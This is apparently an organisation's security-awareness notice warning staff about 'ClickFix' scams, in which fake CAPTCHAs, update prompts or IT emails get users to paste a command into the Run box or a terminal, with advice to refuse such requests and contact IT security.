Beware of the 'ClickFix' Scam

You might be browsing the web when a realistic error message pops up, or you might receive an urgent email with specific technical instructions. These attacks often disguise themselves as:

• A fake CAPTCHA test to prove you are human.

• A warning that your browser needs an emergency update.

• A fake video call microphone or camera error.

• An email pretending to be from IT support asking you to run a quick system fix or some other urgent software update or security requirement.

Whether on a webpage or in an email, the attackers will provide a string of text for you to copy. They will then give you step-by-step instructions to:

1. Press the Windows Key + R (to open the Run box or CMD on Windows) or open a Terminal on Mac or Linux.

2. Paste the copied text (usually a malicious command designed to look innocent or overly complex to hide it's true intent).

3. Press Enter.

By running this command, you are essentially "downloading" and running the malicious software yourself. 

Sometimes a web page will automatically "copy" the command to you clipboard, and will just require that you paste it into the Run command or Command or Terminal window to execute it.

The Golden Rule to Protect Yourself

The most important takeaway is this: Any email, website, or pop-up that asks you to open the Run box, CMD, or a Mac or Linux terminal and paste or type a command is malicious. * Never run system commands from the web or emails: Legitimate services will never ask you to use your command prompt to fix an issue.

• Always verify with Security: Never paste or type commands into these windows unless you have explicitly checked with our IT security team first.

• Do not panic: These messages are designed to rush you. Close your browser tab or report the email immediately without interacting with the instructions.

Staying vigilant and Politely Paranoid is our best defence.